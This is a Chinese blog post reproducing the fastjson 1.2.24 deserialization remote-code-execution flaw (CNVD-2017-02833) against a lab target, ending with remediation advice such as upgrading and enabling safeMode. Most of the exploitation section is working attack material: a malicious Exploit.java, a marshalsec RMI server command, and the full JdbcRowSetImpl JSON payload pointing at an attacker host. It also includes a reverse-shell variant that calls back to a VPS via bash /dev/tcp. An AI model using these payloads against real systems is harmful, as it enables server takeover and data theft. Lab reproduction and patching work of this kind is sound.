fastjson 代码执行 (CNVD-2017-02833)复现

最新推荐文章于 2024-05-30 09:48:56 发布
最新推荐文章于 2024-05-30 09:48:56 发布
阅读量2.8k 收藏 4
点赞数 1
分类专栏: 漏洞复现 文章标签: json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121040190
版权

文章目录

所有文章,仅供安全研究与学习之用,后果自负!

前言

Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。

Fastjson多处补丁修补出现纰漏,Fastjson在1.2.68版本以下,无需Autotype开启,或者可绕过autoType限制,攻击者即可通过精心构造的请求包在使用Fastjson的服务器上进行远程代码执行。

一、fastjson 代码执行 (CNVD-2017-02833)

判断是否是 fastjson

随便post 提交 fastjson 格式 数据尝试报错 看响应包

{
	"b":
}
1.2.24版本以下看不出什么

高版本 会有返回 com.alibaba.fastjson.JSON

0x01 漏洞描述

fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据, 使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链。

由于1.2.24版本及之前版本
fast json对传入的参数没有检查过滤 只要再 “b”: { }内就会被反序列化。
@type 恶意类
dataSourceName 类的属性
rmi 恶意服务 该机器执行另一个机器给的命令(不会显)
autoCommit :true 执行命令

发包后 靶场服务器 拿到恶意数据反序列化后 就去找rmi服务器问要执行什么命令
rmi服务器就让靶场服务执行 http服务器下写好的命令

漏洞危害

恶意攻击者可以利用漏洞攻击做到:

1、执行远程命令,获取服务数据

2、执行远程命令,植入后门,控制服务器

0x02 影响范围

fastjson <=1.2.24

0x03 漏洞利用

访问主页
如下 json格式
在这里插入图片描述

1.创建文件攻击尝试

1.1 编译恶意类

生成 Exploit.class

javac Exploit.java

Exploit.java 内容如下

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "touch /tmp/exphub"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

在这里插入图片描述

1.2 python启用http服务 部署 Exploit.class

通过python命令放到外网环境中,默认监听端口8000。
Python2 :python2 -m SimpleHTTPServer 8000
Python3 :python -m http.server 8000
在这里插入图片描述

1.3 marshalsec 开启 rmi
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.157.137:8000/#Exploit" 9999

在这里插入图片描述

1.4 发起攻击

发送数据包

POST / HTTP/1.1
Host: 靶机ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 163

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://攻击机ip:9999/Exploit",
        "autoCommit":true
    }
}

在这里插入图片描述

看rmi服务
连接来自 靶机129 说明 靶机执行了远程命令 攻击成功
在这里插入图片描述
在这里插入图片描述
创建成功
在这里插入图片描述

脚本用法:
python3 fastjson-1.2.24_rce.py http://192.168.157.129:8090/ rmi://192.168.157.137:9999/Exploit

2.反弹shell

修改exploit.java文件内容

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
 
public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/VPSip地址/9897 0>&1"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
 
        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }
 
        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }
 
    public static void main(String[] args) throws Exception {
    }
}

javac Exploit.java      
#python3开启http服务  
python3 -m http.server 80
#VPS攻击机开启rmi服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar     marshalsec.jndi.RMIRefServer "http://VPSip地址/#Exploit" 1099    
#因为 靶机在内网 rmp服务在vps外网 所以用kali执行该命令
python3 fastjson-1.2.24_rce.py http://192.168.157.129:8090/ rmi://VPSip地址:1099/Exploit

.在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

执行脚本说 发送失败,但是返回shell成功
在这里插入图片描述

(kali - vps+)

0x04 漏洞修复

1.升级至安全版本.

2.对fastjson进行一定的安全加固措施

3.采用其他json处理组件替换,jackson-databind漏洞也频发,建议使用Gson

4.使用WAF紧急漏洞拦截,再升级到安全版本

代码修复

1.升级至安全版本,参考下载链接:https://repo1.maven.org/maven2/com/alibaba/fastjson/

2.对fastjson进行一定的安全加固措施

fastjson在1.2.68及之后的版本中引入了safeMode,配置safeMode后,无论白名单和黑名单,都不支持autoType,可一定程度上缓解反序列化Gadgets类变种攻击(关闭autoType注意评估对业务的影响)

开启方法参考:

打开SafeMode功能

在1.2.68之后的版本,在1.2.68版本中,fastjson增加了safeMode的支持。safeMode打开后,完全禁用autoType。所有的安全修复版本sec10也支持SafeMode配置。

有三种方式配置SafeMode,如下:

A.在代码中配置
ParserConfig.getGlobalInstance().setSafeMode(true);
B.加上JVM启动参数
-Dfastjson.parser.safeMode=true
如果有多个包名前缀,用逗号隔开

C.通过fastjson.properties文件配置。

通过类路径的fastjson.properties文件来配置,配置方式如下:
fastjson.parser.safeMode=true

3.采用其他json处理组件替换,jackson-databind漏洞也频发,建议使用Gson

总结

· 1.2.25开始 fast json关闭了 autotype支持 加入了checkAutotype

checkAutotype
过滤了下@type里面的值  ==
 com.sun.rowset.jdbcRowSetlmpl

用kali搭建rmi服务的时候
touch 命令成功 反弹shell失败

All illegal access operations will be denied in a future release
百度应该是 jdk版本问题
VPS jdk 8可以
在这里插入图片描述
kali 11不行

在这里插入图片描述

·

LuckyCharm~
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fastjson-1.2.54-API文档-中文版.zip
07-09
赠送源代码fastjson-1.2.54-sources.jar; 赠送Maven依赖信息文件:fastjson-1.2.54.pom; 包含翻译后的API文档:fastjson-1.2.54-javadoc-API文档-中文(简体)版.zip; Maven坐标:com.alibaba:fastjson:1.2.54; ...
fastjson 代码执行CNVD-2017-02833)和(CNVD-2019-22238)
m0_57780106的博客
09-18 153
fastjson 代码执行CNVD-2017-02833)和fastjson 代码执行CNVD-2019-22238)
fastjson 代码执行CNVD-2017-02833
qq_40646572的博客
05-08 910
fastjson
探秘Fastjson安全漏洞:fastjson-bypass-autotype-1.2.68
最新发布
gitblog_00025的博客
05-30 276
探秘Fastjson安全漏洞:fastjson-bypass-autotype-1.2.68 项目地址:https://gitcode.com/Y4er/fastjson-bypass-autotype-1.2.68 在Java世界里,Fastjson是一个广泛使用的JSON库,以其高效和便捷性赢得了开发者们的喜爱。然而,随着技术的发展,安全问题日益凸显。本文将为您揭示一个关于Fastjson的安...
CWE-502漏洞原理及利用
子曰小玖的博客
03-07 2402
#!/usr/local/bin/python3 """ ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability Download: https://www.manageengine.com/produ...
IntelliJ IDEA [警告] pom的依赖中出现警告Provides transitive vulnerable dependency
热门推荐
好久不见的流星
12-31 1万+
在我们的工程 pom.xml 中的依赖中,所依赖的 spring-boot-starter-web 出现了警告(Provides transitive vulnerable dependency maven:ch.qos.logback:logback-classic:1.4.11),本文将介绍如何去消灭它。
2023年最具威胁的25种安全漏洞(CWE TOP 25)
hwxiaozhi的博客
07-14 983
CWE的工作者们已经意识到CWE与缺陷的映射时出现的重叠或CWE之间存在模糊的交集,会给缺陷分类带来很多的困惑,最最近的几个版本中,正试图通过增加节点以及映射说明,逐步的修正这个问题。)中的公共漏洞数据来计算的,以获取前两个日历年 CWE 弱点的根本原因映射。最近几年,每年6月CWE发布的版本都成为一年中最重要的版本,因为里面包含了新的CWE TOP 25 视图,也就是我们常说的:CWE最具威胁的25种缺陷。这个节点信息的增加,将为我们在CWE与缺陷映射时,提供极大的帮助,以提高映射的准确性。
fastjson反序列化漏洞
whj_study的博客
02-21 6201
# 漏洞名称: fastjson-cnvd_2017_02833 ## 漏洞简介 * Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java对象。 * Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON字符串转换为 Java 对象 Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义
fastjson-jaxrs-json-provider-0.3.1-API文档-中文版.zip
04-27
赠送源代码fastjson-jaxrs-json-provider-0.3.1-sources.jar; 赠送Maven依赖信息文件:fastjson-jaxrs-json-provider-0.3.1.pom; 包含翻译后的API文档:fastjson-jaxrs-json-provider-0.3.1-javadoc-API文档-...
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
"fastjson-rce-exploit"正是针对Fastjson中的一个严重安全漏洞——远程代码执行(RCE)的利用方法。这个漏洞的存在,使得攻击者有可能通过精心构造的JSON输入,执行任意的远程代码,对目标系统造成严重的危害。 ...
fastjson-1.2.28-API文档-中英对照版.zip
04-08
赠送源代码fastjson-1.2.28-sources.jar; 包含翻译后的API文档:fastjson-1.2.28-javadoc-API文档-中文(简体)-英语-对照版.zip 对应Maven信息:groupId:com.alibaba,artifactId:fastjson,version:1.2.28 ...
网站漏洞总结
10-17
网站漏洞
fastjson-1.2.51-API文档-中文版.zip
05-01
赠送源代码fastjson-1.2.51-sources.jar; 赠送Maven依赖信息文件:fastjson-1.2.51.pom; 包含翻译后的API文档:fastjson-1.2.51-javadoc-API文档-中文(简体)版.zip; Maven坐标:com.alibaba:fastjson:1.2.51; ...
fastjson-cnvd-2017-02833漏洞复现 | Web漏洞挖掘班作业
Ms08067安全实验室
12-08 807
文章来源|MS08067 Web安全漏洞挖掘实战班课后作业本文作者:某学员A(Web漏洞挖掘实战班2期学员)一、漏洞概述fastjson在解析json的过程中,支持使用@type字段来指定...
【Vulfocus漏洞复现fastjson-cnvd_2017_02833fastjson-cnvd_2019_22238
weixin_45632448的博客
04-12 4427
vps:centos8 腾讯云 本地:windows11 靶场环境:http://123.58.236.76:24477/ 访问靶场环境:http://123.58.236.76:24477/ burp进行抓包,将请求方式改为POST,能够请求json数据,可能存在fastjson漏洞 准备两个东西:Exploit.class、marshalsec-0.0.3-SNAPSHOT-all.jar(准备过程不详述,网上都有) 在本地创建Exploit.java,内容如下 import java.io.Buf
【安全攻防知识-9】Fastjson(CNVD-2017-02833)验证
qq_26579613的博客
06-29 772
vulfocus-Fastjson(CNVD-2017-02833)验证
checkmarx检测js中的jQuery安全漏洞
tang31415926的博客
12-29 2399
checkmarx安全漏洞检测问题(javascript)处理
maven中依赖变黄并提示Show vulnerabilities info for xxx.xxxx.xxxx:protobuf-java:3.11.4
Java和网络安全学习交流
12-14 1万+
这样就可以了,还有就是版本号下面波浪线也可以取消了,在Inspections中找到Package Search,在这个下面有一个Package Search | Check for new dependency versions (Maven)取消就可以了。出现这种情况是因为你的依赖的jar包在这个版本有漏洞,你点击之后就能看见详细的漏洞信息;很多朋友发现自己在导入maven中的依赖后有些依赖会变黄;那么如何解决这个问题呢?那么为什么会出现这种情况呢?
CWE 发布 2021 年最危险的 25 种软件缺陷
Innocence_0的博客
01-10 268
《CWE发布2021年最危险的25种软件缺陷》
fastjson代码执行漏洞
09-21
Fastjson是一款由阿里巴巴开源的json解析器,它在Java项目中广泛应用。然而,在Fastjson 1.2.48之前的版本中存在代码执行漏洞。这个漏洞的原理是,Fastjson在1.2.24版本后引入了反序列化白名单机制,但攻击者可以构造特殊的json字符串来绕过白名单检测,从而执行任意命令。这个漏洞的存在可能导致远程命令执行、敏感信息泄露等安全风险。 如果你使用的是Fastjson旧版本,请尽快升级到最新版本以修复这个漏洞。目前,Fastjson的最新版本是1.2.74。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值